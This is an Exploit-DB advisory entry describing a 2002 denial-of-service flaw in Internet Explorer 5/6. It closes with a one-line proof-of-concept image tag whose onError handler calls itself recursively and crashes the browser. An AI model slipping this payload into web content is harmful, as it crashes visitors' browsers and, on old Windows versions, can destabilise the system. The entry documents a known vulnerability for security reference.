Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service

EDB-ID:

21416

CVE:





Platform:

Windows

Date:

2002-04-24


source: https://www.securityfocus.com/bid/4583/info

An issue has been reported in some versions of Microsoft Internet Explorer. It is possible for a malicious web page using JavaScript to crash the browser process. Under Windows 95 and 98, this may impact the underlying operating system as well.

This behavior can be caused by the indirect recursive calling of an onError event which redefines an invalid source to an image tag.

<IMG src="::" onError="this.src='::';">